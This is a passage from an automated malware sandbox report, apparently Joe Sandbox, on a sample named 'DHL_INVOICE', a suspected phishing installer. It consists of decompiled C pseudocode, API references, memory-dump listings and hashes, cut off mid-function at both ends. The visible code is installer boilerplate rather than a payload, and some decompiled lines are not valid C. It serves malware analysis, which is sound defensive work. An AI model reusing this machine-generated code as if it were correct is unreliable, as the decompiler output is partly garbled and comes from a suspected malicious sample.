                                                                            											_t141 = _t140 + _t78 * 2;
                                                                            											_t79 = 0xd;
                                                                            											 *_t141 = _t79;
                                                                            											_t80 = 0xa;
                                                                            											 *((short*)(_t141 + 2)) = _t80;
                                                                            											_t140 = _t141 + 4;
                                                                            											_t144 = _t144 + 1;
                                                                            										} while (_t144 < _t150);
                                                                            										_t151 =  *(_t153 + 0x60);
                                                                            										GlobalUnlock(_t151);
                                                                            										_push(_t151);
                                                                            										_t82 = 0xd;
                                                                            										SetClipboardData(_t82, ??);
                                                                            										CloseClipboard();
                                                                            									}
                                                                            									goto L37;
                                                                            								}
                                                                            							}
                                                                            							if( *0x4349ec == 0) {
                                                                            								ShowWindow( *0x4349f8, 8);
                                                                            								if( *0x435acc == 0) {
                                                                            									E00405D3A( *((intOrPtr*)( *0x42dd4c + 0x34)), 0);
                                                                            								}
                                                                            								_push(1);
                                                                            							} else {
                                                                            								 *0x42bd44 = 2;
                                                                            								_push(0x78);
                                                                            							}
                                                                            							E00405958();
                                                                            							goto L14;
                                                                            						}
                                                                            						if( *(_t153 + 0x68) == 0x403) {
                                                                            							ShowWindow( *0x4349e4, 0);
                                                                            							ShowWindow(_t128, 8);
                                                                            							E00405503(_t128);
                                                                            						}
                                                                            						goto L14;
                                                                            					}
                                                                            					_t97 = CreateThread(0, 0, E00405864, GetDlgItem( *(_t153 + 0x6c), 0x3ec), 0, _t153 + 0x64); // executed
                                                                            					CloseHandle(_t97); // executed
                                                                            					goto L14;
                                                                            				}
                                                                            				 *(_t153 + 0x34) =  *(_t153 + 0x34) | 0xffffffff;
                                                                            				 *(_t153 + 0x20) = 2;
                                                                            				 *((intOrPtr*)(_t153 + 0x24)) = 0;
                                                                            				 *((intOrPtr*)(_t153 + 0x2c)) = 0;
                                                                            				 *((intOrPtr*)(_t153 + 0x30)) = 0;
                                                                            				asm("stosd");
                                                                            				asm("stosd");
                                                                            				asm("stosd");
                                                                            				asm("stosd");
                                                                            				asm("stosd");
                                                                            				_t100 =  *0x435a10;
                                                                            				_t152 =  *(_t100 + 0x5c);
                                                                            				 *(_t153 + 0x70) =  *(_t100 + 0x60);
                                                                            				 *0x4349e4 = GetDlgItem( *(_t153 + 0x64), 0x403);
                                                                            				 *0x4349c8 = GetDlgItem( *(_t153 + 0x64), 0x3ee);
                                                                            				_t130 = GetDlgItem( *(_t153 + 0x64), 0x3f8);
                                                                            				 *0x4349e8 = _t130;
                                                                            				E00405503( *0x4349e4);
                                                                            				 *0x4349cc = E00405835(4);
                                                                            				 *0x4349d0 = 0;
                                                                            				GetClientRect(_t130, _t153 + 0x10);
                                                                            				 *(_t153 + 0x28) =  *((intOrPtr*)(_t153 + 0x18)) - GetSystemMetrics(2);
                                                                            				SendMessageW(_t130, 0x1061, 0, _t153 + 0x20); // executed
                                                                            				SendMessageW(_t130, 0x1036, 0x4000, 0x4000); // executed
                                                                            				if(_t152 >= 0) {
                                                                            					SendMessageW(_t130, 0x1001, 0, _t152);
                                                                            					SendMessageW(_t130, 0x1026, 0, _t152);
                                                                            				}
                                                                            				_t114 =  *(_t153 + 0x68);
                                                                            				if(_t114 >= 0) {
                                                                            					SendMessageW(_t130, 0x1024, 0, _t114);
                                                                            				}
                                                                            				_push( *((intOrPtr*)( *(_t153 + 0x6c) + 0x30)));
                                                                            				_push(0x1b);
                                                                            				E0040551A( *(_t153 + 0x68));
                                                                            				if(( *0x435a0c & 0x00000003) != 0) {
                                                                            					ShowWindow( *0x4349e4, 0);
                                                                            					if(( *0x435a0c & 0x00000002) != 0) {
                                                                            						 *0x4349e4 = 0;
                                                                            					} else {
                                                                            						ShowWindow(_t130, 8);
                                                                            					}
                                                                            					E00405503( *0x4349c8);
                                                                            				}
                                                                            				_t131 = GetDlgItem( *(_t153 + 0x64), 0x3ec);
                                                                            				SendMessageW(_t131, 0x401, 0, 0x75300000);
                                                                            				if(( *0x435a0c & 0x00000004) != 0) {
                                                                            					SendMessageW(_t131, 0x409, 0,  *(_t153 + 0x68));
                                                                            					SendMessageW(_t131, 0x2001, 0, _t152);
                                                                            				}
                                                                            				goto L37;
                                                                            			}






























                                                                            0x00404b34
                                                                            0x00404b3d
                                                                            0x00404b47
                                                                            0x00404cdf
                                                                            0x00404d2b
                                                                            0x00404d5c
                                                                            0x00404da7
                                                                            0x00404d0d
                                                                            0x00000000
                                                                            0x00404db7
                                                                            0x00404db7
                                                                            0x00404dc7
                                                                            0x00404dc9
                                                                            0x00404dcf
                                                                            0x00404ee5
                                                                            0x00000000
                                                                            0x00404ee5
                                                                            0x00404dd5
                                                                            0x00404ddb
                                                                            0x00404ddd
                                                                            0x00404dde
                                                                            0x00404de2
                                                                            0x00404dea
                                                                            0x00404df1
                                                                            0x00404df7
                                                                            0x00404e00
                                                                            0x00404e03
                                                                            0x00404e07
                                                                            0x00404e0f
                                                                            0x00404e15
                                                                            0x00404e19
                                                                            0x00404e19
                                                                            0x00404e39
                                                                            0x00404e3f
                                                                            0x00404e43
                                                                            0x00404e4b
                                                                            0x00404e53
                                                                            0x00404e57
                                                                            0x00404e69
                                                                            0x00404e6b
                                                                            0x00404e70
                                                                            0x00404e76
                                                                            0x00404e88
                                                                            0x00404e8b
                                                                            0x00404e8f
                                                                            0x00404e95
                                                                            0x00404e99
                                                                            0x00404e9b
                                                                            0x00404e9f
                                                                            0x00404eab
                                                                            0x00404eb3
                                                                            0x00404eb6
                                                                            0x00404eb7
                                                                            0x00404ebc
                                                                            0x00404ebd
                                                                            0x00404ec1
                                                                            0x00404ec4
                                                                            0x00404ec5
                                                                            0x00404ec9
                                                                            0x00404ece
                                                                            0x00404ed4
                                                                            0x00404ed7
                                                                            0x00404ed9
                                                                            0x00404edf
                                                                            0x00404edf
                                                                            0x00000000
                                                                            0x00404e39
                                                                            0x00404da7
                                                                            0x00404d65
                                                                            0x00404d82
                                                                            0x00404d8f
                                                                            0x00404d9b
                                                                            0x00404d9b
                                                                            0x00404da0
                                                                            0x00404d67
                                                                            0x00404d67
                                                                            0x00404d71
                                                                            0x00404d71
                                                                            0x00404d73
                                                                            0x00000000
                                                                            0x00404d73
                                                                            0x00404d37
                                                                            0x00404d47
                                                                            0x00404d4c
                                                                            0x00404d4f
                                                                            0x00404d4f
                                                                            0x00000000
                                                                            0x00404d37
                                                                            0x00404d00
                                                                            0x00404d07
                                                                            0x00000000
                                                                            0x00404d07
                                                                            0x00404b4d
                                                                            0x00404b56
                                                                            0x00404b68
                                                                            0x00404b6c
                                                                            0x00404b70
                                                                            0x00404b74
                                                                            0x00404b7e
                                                                            0x00404b7f
                                                                            0x00404b80
                                                                            0x00404b81
                                                                            0x00404b82
                                                                            0x00404b87
                                                                            0x00404b8d
                                                                            0x00404b9c
                                                                            0x00404bac
                                                                            0x00404bb9
                                                                            0x00404bbb
                                                                            0x00404bc1
                                                                            0x00404bcd
                                                                            0x00404bd8
                                                                            0x00404bde
                                                                            0x00404bfc
                                                                            0x00404c08
                                                                            0x00404c17
                                                                            0x00404c1b
                                                                            0x00404c25
                                                                            0x00404c2f
                                                                            0x00404c2f
                                                                            0x00404c31
                                                                            0x00404c37
                                                                            0x00404c41
                                                                            0x00404c41
                                                                            0x00404c47
                                                                            0x00404c4a
                                                                            0x00404c50
                                                                            0x00404c5c
                                                                            0x00404c65
                                                                            0x00404c72
                                                                            0x00404c7f
                                                                            0x00404c74
                                                                            0x00404c77
                                                                            0x00404c77
                                                                            0x00404c8b
                                                                            0x00404c8b
                                                                            0x00404ca5
                                                                            0x00404cad
                                                                            0x00404cb6
                                                                            0x00404cc8
                                                                            0x00404cd2
                                                                            0x00404cd2
                                                                            0x00000000

                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000403), ref: 00404B91
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00404BA1
                                                                            • GetClientRect.USER32(00000000,?), ref: 00404BDE
                                                                            • GetSystemMetrics.USER32(00000002), ref: 00404BE6
                                                                            • SendMessageW.USER32(00000000,00001061,00000000,00000002), ref: 00404C08
                                                                            • SendMessageW.USER32(00000000,00001036,00004000,00004000), ref: 00404C17
                                                                            • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00404C25
                                                                            • SendMessageW.USER32(00000000,00001026,00000000,?), ref: 00404C2F
                                                                              • Part of subcall function 00405EBA: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406070
                                                                            • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 00404C41
                                                                            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404C65
                                                                            • ShowWindow.USER32(00000000,00000008), ref: 00404C77
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00404C99
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00404CAD
                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00404CC8
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,?), ref: 00404CD2
                                                                            • ShowWindow.USER32(00000000), ref: 00404D47
                                                                            • ShowWindow.USER32(?,00000008), ref: 00404D4C
                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00404BB1
                                                                              • Part of subcall function 00405503: SendMessageW.USER32(00000028,?,00000001,00405338), ref: 00405511
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00404CF2
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005864,00000000), ref: 00404D00
                                                                            • CloseHandle.KERNELBASE(00000000), ref: 00404D07
                                                                            • ShowWindow.USER32(00000008), ref: 00404D82
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404DC1
                                                                            • CreatePopupMenu.USER32 ref: 00404DD5
                                                                            • AppendMenuW.USER32(?,00000000,00000001,00000000), ref: 00404DF1
                                                                            • GetWindowRect.USER32(?,?), ref: 00404E0F
                                                                            • TrackPopupMenu.USER32(?,00000180,?,?,00000000,?,00000000), ref: 00404E31
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00404E60
                                                                            • OpenClipboard.USER32(00000000), ref: 00404E70
                                                                            • EmptyClipboard.USER32 ref: 00404E76
                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00404E82
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00404E8F
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00404EAB
                                                                            • GlobalUnlock.KERNEL32(?), ref: 00404ECE
                                                                            • SetClipboardData.USER32(0000000D,?), ref: 00404ED9
                                                                            • CloseClipboard.USER32 ref: 00404EDF
                                                                            Strings
                                                                            • Somatopleural Setup: Installing, xrefs: 00404E43
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrcat
                                                                            • String ID: Somatopleural Setup: Installing
                                                                            • API String ID: 2901622961-52397148
                                                                            • Opcode ID: 7ec54c2a3a868982bb039b13d8fa38caacdb03059396a995cf16b9d83891ef8f
                                                                            • Instruction ID: b8a9fdf254180bfaf0004a99ba51f40fd9d2112bd445e4f5698f4cfe216f0b8a
                                                                            • Opcode Fuzzy Hash: 7ec54c2a3a868982bb039b13d8fa38caacdb03059396a995cf16b9d83891ef8f
                                                                            • Instruction Fuzzy Hash: 45A1BEB1604304BBE720AF61DD89F9B7FA9FFC4754F00092AF645A62E1C7789840CB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 83%
                                                                            			E6F1C2351() {
                                                                            				void _v4;
                                                                            				void* _v8;
                                                                            				signed short _v12;
                                                                            				signed int _v16;
                                                                            				WCHAR* _v20;
                                                                            				signed int _v24;
                                                                            				signed int _v28;
                                                                            				signed int _v32;
                                                                            				signed int _v36;
                                                                            				void* _v40;
                                                                            				signed int _v44;
                                                                            				signed int _v48;
                                                                            				signed int _v52;
                                                                            				signed int _v56;
                                                                            				void* _v60;
                                                                            				short* _t243;
                                                                            				signed short* _t245;
                                                                            				signed int _t246;
                                                                            				signed int _t250;
                                                                            				void* _t256;
                                                                            				struct HINSTANCE__* _t257;
                                                                            				signed int _t258;
                                                                            				signed int _t260;
                                                                            				void* _t261;
                                                                            				signed short _t263;
                                                                            				signed int _t267;
                                                                            				void* _t268;
                                                                            				signed int* _t269;
                                                                            				void* _t280;
                                                                            				signed int _t281;
                                                                            				signed int _t282;
                                                                            				signed int _t284;
                                                                            				signed int _t287;
                                                                            				void* _t289;
                                                                            				signed int _t290;
                                                                            				void* _t294;
                                                                            				signed int _t295;
                                                                            				signed short* _t296;
                                                                            				void* _t299;
                                                                            				signed int _t306;
                                                                            				signed int _t307;
                                                                            				signed int _t311;
                                                                            				signed int _t313;
                                                                            				signed int _t314;
                                                                            				signed int _t315;
                                                                            				short* _t320;
                                                                            				signed int _t321;
                                                                            				signed short* _t325;
                                                                            				signed int _t327;
                                                                            				WCHAR* _t328;
                                                                            				signed short* _t329;
                                                                            				signed int _t341;
                                                                            				void* _t343;
                                                                            				signed int _t344;
                                                                            				signed int _t345;
                                                                            				signed int _t346;
                                                                            				void* _t349;
                                                                            				signed int _t350;
                                                                            				signed int _t352;
                                                                            				signed int _t354;
                                                                            				signed int _t355;
                                                                            				void* _t356;
                                                                            				void* _t357;
                                                                            				void* _t358;
                                                                            				void* _t359;
                                                                            				signed int _t365;
                                                                            				signed int _t370;
                                                                            				void* _t371;
                                                                            				signed int _t378;
                                                                            				signed int _t379;
                                                                            				signed int _t380;
                                                                            				void* _t381;
                                                                            				signed short* _t383;
                                                                            				void* _t384;
                                                                            				void* _t386;
                                                                            				signed short* _t387;
                                                                            				short* _t388;
                                                                            				WCHAR* _t389;
                                                                            				WCHAR* _t390;
                                                                            				struct HINSTANCE__* _t391;
                                                                            				signed int _t393;
                                                                            				signed int _t394;
                                                                            				signed short _t395;
                                                                            				void _t396;
                                                                            				void* _t398;
                                                                            				void* _t403;
                                                                            				signed int _t405;
                                                                            				signed int _t407;
                                                                            				signed int _t409;
                                                                            
                                                                            				_t394 = 0;
                                                                            				_v32 = 0;
                                                                            				_v52 = 0;
                                                                            				_t386 = 0;
                                                                            				_v28 = 0;
                                                                            				_v56 = 0;
                                                                            				_v24 = 0;
                                                                            				_v16 = 0;
                                                                            				_v36 = 0;
                                                                            				_t243 = E6F1C12F8();
                                                                            				_v40 = _t243;
                                                                            				_t320 = _t243;
                                                                            				_v20 = E6F1C12F8();
                                                                            				_t245 = E6F1C1593();
                                                                            				_t325 = _t245;
                                                                            				_v8 = _t245;
                                                                            				_v60 = _t325;
                                                                            				_t387 = _t245;
                                                                            				_v44 = _t325;
                                                                            				_v4 = 2;
                                                                            				while(1) {
                                                                            					_t378 = _t394;
                                                                            					if(_t394 != 0 && _t386 == 0) {
                                                                            						break;
                                                                            					}
                                                                            					_t395 =  *_t325 & 0x0000ffff;
                                                                            					_t246 = _t395 & 0x0000ffff;
                                                                            					_v12 = _t395;
                                                                            					_t327 = _t246;
                                                                            					if(_t327 == 0) {
                                                                            						_t175 =  &_v52;
                                                                            						 *_t175 = _v52 | 0xffffffff;
                                                                            						__eflags =  *_t175;
                                                                            						L132:
                                                                            						_t396 = _v32;
                                                                            						L133:
                                                                            						_t379 = _t378;
                                                                            						if(_t379 == 0) {
                                                                            							 *_t320 = 0;
                                                                            							__eflags = _t386;
                                                                            							if(_t386 != 0) {
                                                                            								_t380 = 0;
                                                                            								__eflags = 0;
                                                                            							} else {
                                                                            								_t289 = GlobalAlloc(0x40, 0x1ca4); // executed
                                                                            								_t386 = _t289;
                                                                            								_t380 = 0;
                                                                            								 *(_t386 + 0x1010) = 0;
                                                                            								 *((intOrPtr*)(_t386 + 0x1014)) = 0;
                                                                            							}
                                                                            							 *(_t386 + 0x1008) = _t380;
                                                                            							_t184 = _t386 + 8; // 0x8
                                                                            							_t328 = _t184;
                                                                            							 *(_t386 + 0x100c) = _t380;
                                                                            							_t186 = _t386 + 0x808; // 0x808
                                                                            							_t388 = _t186;
                                                                            							 *_t328 = 0;
                                                                            							 *_t388 = 0;
                                                                            							 *_t386 = _t396;
                                                                            							 *(_t386 + 4) = _t380;
                                                                            							_t250 = _t396 - _t380;
                                                                            							__eflags = _t250;
                                                                            							if(_t250 == 0) {
                                                                            								__eflags = _t320 - _v40;
                                                                            								if(_t320 == _v40) {
                                                                            									goto L157;
                                                                            								}
                                                                            								_t393 = _t380;
                                                                            								GlobalFree(_t386);
                                                                            								_push(_v40);
                                                                            								_t386 = E6F1C135A();
                                                                            								__eflags = _t386;
                                                                            								if(_t386 == 0) {
                                                                            									goto L157;
                                                                            								} else {
                                                                            									goto L150;
                                                                            								}
                                                                            								while(1) {
                                                                            									L150:
                                                                            									_t280 =  *(_t386 + 0x1ca0);
                                                                            									__eflags = _t280;
                                                                            									if(_t280 == 0) {
                                                                            										break;
                                                                            									}
                                                                            									_t393 = _t386;
                                                                            									_t386 = _t280;
                                                                            								}
                                                                            								__eflags = _t393;
                                                                            								if(_t393 != 0) {
                                                                            									_t193 = _t393 + 0x1ca0;
                                                                            									 *_t193 =  *(_t393 + 0x1ca0) & 0x00000000;
                                                                            									__eflags =  *_t193;
                                                                            								}
                                                                            								_t281 =  *(_t386 + 0x1010);
                                                                            								__eflags = _t281 & 0x00000008;
                                                                            								if((_t281 & 0x00000008) == 0) {
                                                                            									_t341 = 2;
                                                                            									_t282 = _t281 | _t341;
                                                                            									__eflags = _t282;
                                                                            									 *(_t386 + 0x1010) = _t282;
                                                                            								} else {
                                                                            									_t386 = E6F1C1309(_t386);
                                                                            									 *(_t386 + 0x1010) =  *(_t386 + 0x1010) & 0xfffffff5;
                                                                            								}
                                                                            								goto L157;
                                                                            							} else {
                                                                            								_t284 = _t250 - 1;
                                                                            								__eflags = _t284;
                                                                            								if(_t284 == 0) {
                                                                            									L145:
                                                                            									lstrcpyW(_t328, _v20);
                                                                            									L146:
                                                                            									_push(_v40);
                                                                            									_push(_t388);
                                                                            									L147:
                                                                            									lstrcpyW();
                                                                            									L157:
                                                                            									_t329 = _v60;
                                                                            									L158:
                                                                            									_t320 = _v40;
                                                                            									L159:
                                                                            									_t394 = _v52;
                                                                            									_t325 =  &(_t329[1]);
                                                                            									_v60 = _t325;
                                                                            									_t387 = _t325;
                                                                            									_v44 = _t325;
                                                                            									if(_t394 != 0xffffffff) {
                                                                            										continue;
                                                                            									}
                                                                            									break;
                                                                            								}
                                                                            								_t287 = _t284 - 1;
                                                                            								__eflags = _t287;
                                                                            								if(_t287 == 0) {
                                                                            									goto L146;
                                                                            								}
                                                                            								__eflags = _t287 != 1;
                                                                            								if(_t287 != 1) {
                                                                            									goto L157;
                                                                            								}
                                                                            								goto L145;
                                                                            							}
                                                                            						}
                                                                            						_t381 = _t379 - 1;
                                                                            						if(_t381 == 0) {
                                                                            							_t290 = _v28;
                                                                            							if(_v24 == _t381) {
                                                                            								_t290 = _t290 - 1;
                                                                            							}
                                                                            							 *((intOrPtr*)(_t386 + 0x1014)) = _t290;
                                                                            						}
                                                                            						goto L157;
                                                                            					}
                                                                            					_t343 = _t327 - 0x23;
                                                                            					if(_t343 == 0) {
                                                                            						__eflags = _t387 - _v8;
                                                                            						if(_t387 <= _v8) {
                                                                            							_t344 = _v52;
                                                                            							L31:
                                                                            							__eflags = _v36;
                                                                            							if(_v36 != 0) {
                                                                            								L15:
                                                                            								_t345 = _t344;
                                                                            								__eflags = _t345;
                                                                            								if(_t345 == 0) {
                                                                            									_t383 = _v60;
                                                                            									while(1) {
                                                                            										__eflags = _t246 - 0x22;
                                                                            										if(_t246 != 0x22) {
                                                                            											break;
                                                                            										}
                                                                            										_t383 =  &(_t383[1]);
                                                                            										__eflags = _v36;
                                                                            										_v60 = _t383;
                                                                            										_t387 = _t383;
                                                                            										if(_v36 == 0) {
                                                                            											__eflags = 1;
                                                                            											_v36 = 1;
                                                                            											L123:
                                                                            											_t329 = _v60;
                                                                            											 *_t320 =  *_t329;
                                                                            											_t294 = 2;
                                                                            											_t320 = _t320 + _t294;
                                                                            											goto L159;
                                                                            										}
                                                                            										_t161 =  &_v36;
                                                                            										 *_t161 = _v36 & 0x00000000;
                                                                            										__eflags =  *_t161;
                                                                            										_t246 =  *_t383 & 0x0000ffff;
                                                                            									}
                                                                            									__eflags = _t246 - 0x2a;
                                                                            									if(_t246 == 0x2a) {
                                                                            										_t295 = 2;
                                                                            										_v32 = _t295;
                                                                            										goto L157;
                                                                            									}
                                                                            									_t398 = 0x2d;
                                                                            									__eflags = _t246 - _t398;
                                                                            									if(_t246 == _t398) {
                                                                            										L119:
                                                                            										_t346 =  *_t383 & 0x0000ffff;
                                                                            										__eflags = _t346 - _t398;
                                                                            										if(_t346 != _t398) {
                                                                            											L124:
                                                                            											_t296 =  &(_t383[1]);
                                                                            											_t384 = 0x3a;
                                                                            											__eflags =  *_t296 - _t384;
                                                                            											if( *_t296 != _t384) {
                                                                            												goto L123;
                                                                            											}
                                                                            											__eflags = _t346 - _t398;
                                                                            											if(_t346 == _t398) {
                                                                            												goto L123;
                                                                            											}
                                                                            											__eflags = 1;
                                                                            											_v32 = 1;
                                                                            											L127:
                                                                            											_t329 = _t296;
                                                                            											_v60 = _t329;
                                                                            											__eflags = _t320 - _v40;
                                                                            											if(_t320 <= _v40) {
                                                                            												 *_v20 = 0;
                                                                            												goto L158;
                                                                            											}
                                                                            											_push(_v40);
                                                                            											_push(_v20);
                                                                            											 *_t320 = 0;
                                                                            											goto L147;
                                                                            										}
                                                                            										_t296 =  &(_t387[1]);
                                                                            										__eflags =  *_t296 - 0x3e;
                                                                            										if( *_t296 != 0x3e) {
                                                                            											goto L124;
                                                                            										}
                                                                            										_v32 = 3;
                                                                            										goto L127;
                                                                            									}
                                                                            									_t349 = 0x3a;
                                                                            									__eflags = _t246 - _t349;
                                                                            									if(_t246 != _t349) {
                                                                            										goto L123;
                                                                            									}
                                                                            									goto L119;
                                                                            								}
                                                                            								_t350 = _t345 - 1;
                                                                            								__eflags = _t350;
                                                                            								if(_t350 == 0) {
                                                                            									_t321 = _v28;
                                                                            									L51:
                                                                            									_t299 = _t246 + 0xffffffde;
                                                                            									__eflags = _t299 - 0x55;
                                                                            									if(_t299 > 0x55) {
                                                                            										goto L157;
                                                                            									}
                                                                            									_t77 = _t299 + 0x6f1c2c69; // 0x39000010
                                                                            									switch( *((intOrPtr*)(( *_t77 & 0x000000ff) * 4 +  &M6F1C2BDD))) {
                                                                            										case 0:
                                                                            											__ecx = _v40;
                                                                            											__ebx = _v60;
                                                                            											_push(2);
                                                                            											__edx = __bp & 0x0000ffff;
                                                                            											_pop(__ebp);
                                                                            											while(1) {
                                                                            												__ebx = __ebx + 2;
                                                                            												__eax =  *__ebx & 0x0000ffff;
                                                                            												__eflags = __ax - __dx;
                                                                            												if(__ax != __dx) {
                                                                            													goto L90;
                                                                            												}
                                                                            												L89:
                                                                            												__eflags =  *(__ebx + 2) - __dx;
                                                                            												if( *(__ebx + 2) != __dx) {
                                                                            													L94:
                                                                            													__ebp = _v40;
                                                                            													__eax = 0;
                                                                            													__eflags = 0;
                                                                            													_v60 = __ebx;
                                                                            													 *__ecx = __ax;
                                                                            													__esi = E6F1C12E1(_v40);
                                                                            													goto L95;
                                                                            												}
                                                                            												L90:
                                                                            												__eflags = __ax;
                                                                            												if(__ax == 0) {
                                                                            													goto L94;
                                                                            												}
                                                                            												__eflags = __ax - __dx;
                                                                            												if(__ax == __dx) {
                                                                            													__ebx = __ebx + 2;
                                                                            													__eflags = __ebx;
                                                                            												}
                                                                            												__ax =  *__ebx;
                                                                            												 *__ecx = __ax;
                                                                            												__ecx = __ecx + __ebp;
                                                                            												__ebx = __ebx + 2;
                                                                            												__eax =  *__ebx & 0x0000ffff;
                                                                            												__eflags = __ax - __dx;
                                                                            												if(__ax != __dx) {
                                                                            													goto L90;
                                                                            												}
                                                                            												goto L89;
                                                                            											}
                                                                            										case 1:
                                                                            											L48:
                                                                            											_v56 = 1;
                                                                            											goto L157;
                                                                            										case 2:
                                                                            											_v56 = _v56 | 0xffffffff;
                                                                            											goto L157;
                                                                            										case 3:
                                                                            											_v56 = _v56 & __edx;
                                                                            											__eax = 0;
                                                                            											_v48 = _v48 & __edx;
                                                                            											__ebx = __ebx + 1;
                                                                            											__eax = 1;
                                                                            											_v28 = __ebx;
                                                                            											_v24 = 1;
                                                                            											goto L157;
                                                                            										case 4:
                                                                            											__eflags = _v48 - __edx;
                                                                            											if(_v48 != __edx) {
                                                                            												goto L157;
                                                                            											}
                                                                            											__eax = _v60;
                                                                            											_push(2);
                                                                            											_pop(__ecx);
                                                                            											__eax = _v60 - __ecx;
                                                                            											_v44 = _v60 - __ecx;
                                                                            											__esi = E6F1C12F8();
                                                                            											__eax =  &_v44;
                                                                            											_push(__esi);
                                                                            											__eax = E6F1C1BCF( &_v44);
                                                                            											_push(__edx);
                                                                            											_push(__eax);
                                                                            											__eax = E6F1C149E(__ecx);
                                                                            											__esp = __esp + 0xc;
                                                                            											goto L83;
                                                                            										case 5:
                                                                            											_v48 = _v48 + 1;
                                                                            											goto L157;
                                                                            										case 6:
                                                                            											_push(7);
                                                                            											goto L77;
                                                                            										case 7:
                                                                            											_push(0x19);
                                                                            											goto L103;
                                                                            										case 8:
                                                                            											__eax = 0;
                                                                            											__eax = 1;
                                                                            											__edx = 1;
                                                                            											goto L60;
                                                                            										case 9:
                                                                            											_push(0x15);
                                                                            											goto L103;
                                                                            										case 0xa:
                                                                            											_push(0x16);
                                                                            											goto L103;
                                                                            										case 0xb:
                                                                            											_push(0x18);
                                                                            											goto L103;
                                                                            										case 0xc:
                                                                            											__eax = 0;
                                                                            											__eflags = 0;
                                                                            											_t105 = __eax + 1; // 0x1
                                                                            											__edx = _t105;
                                                                            											goto L72;
                                                                            										case 0xd:
                                                                            											__eax = 0;
                                                                            											__eax = 1;
                                                                            											__edx = 1;
                                                                            											goto L63;
                                                                            										case 0xe:
                                                                            											__eax = 0;
                                                                            											__eax = 1;
                                                                            											__edx = 1;
                                                                            											goto L78;
                                                                            										case 0xf:
                                                                            											__eax = 0;
                                                                            											__eflags = 0;
                                                                            											_t107 = __eax + 1; // 0x1
                                                                            											__edx = _t107;
                                                                            											goto L76;
                                                                            										case 0x10:
                                                                            											__eax = 0;
                                                                            											__eflags = 0;
                                                                            											_t101 = __eax + 1; // 0x1
                                                                            											__edx = _t101;
                                                                            											goto L67;
                                                                            										case 0x11:
                                                                            											_push(3);
                                                                            											goto L77;
                                                                            										case 0x12:
                                                                            											_push(0x17);
                                                                            											L103:
                                                                            											_pop(__esi);
                                                                            											goto L104;
                                                                            										case 0x13:
                                                                            											__eax =  &_v44;
                                                                            											__eax = E6F1C1BCF( &_v44);
                                                                            											_push(0xb);
                                                                            											_pop(__esi);
                                                                            											_t132 = __eax + 1; // 0x1
                                                                            											__ecx = _t132;
                                                                            											__eflags = _t132 - __esi;
                                                                            											_push(1);
                                                                            											_pop(__ecx);
                                                                            											__esi =  >=  ? _t132 : __esi;
                                                                            											__esi = __eax + __esi;
                                                                            											__eflags = __esi;
                                                                            											goto L83;
                                                                            										case 0x14:
                                                                            											__esi = __esi | 0xffffffff;
                                                                            											goto L104;
                                                                            										case 0x15:
                                                                            											__eax = 0;
                                                                            											__eflags = 0;
                                                                            											_t102 = __eax + 1; // 0x1
                                                                            											__edx = _t102;
                                                                            											goto L70;
                                                                            										case 0x16:
                                                                            											__eax = 0;
                                                                            											goto L78;
                                                                            										case 0x17:
                                                                            											__eax = 0;
                                                                            											__eflags = 0;
                                                                            											_t106 = __eax + 1; // 0x1
                                                                            											__edx = _t106;
                                                                            											goto L74;
                                                                            										case 0x18:
                                                                            											_t351 =  *((intOrPtr*)(_t386 + 0x1014));
                                                                            											__eflags = _t351 - _t321;
                                                                            											_push(1);
                                                                            											_t302 =  <=  ? _t321 : _t351;
                                                                            											_v56 = _v56 & 0;
                                                                            											_v48 = _v48 & 0;
                                                                            											_t322 =  <=  ? _t321 : _t351;
                                                                            											_v28 =  <=  ? _t321 : _t351;
                                                                            											_v32 - 3 = _t351 - (0 | _v32 == 0x00000003);
                                                                            											_pop(_t305);
                                                                            											_t400 =  !=  ? _t305 : _v24;
                                                                            											_v24 =  !=  ? _t305 : _v24;
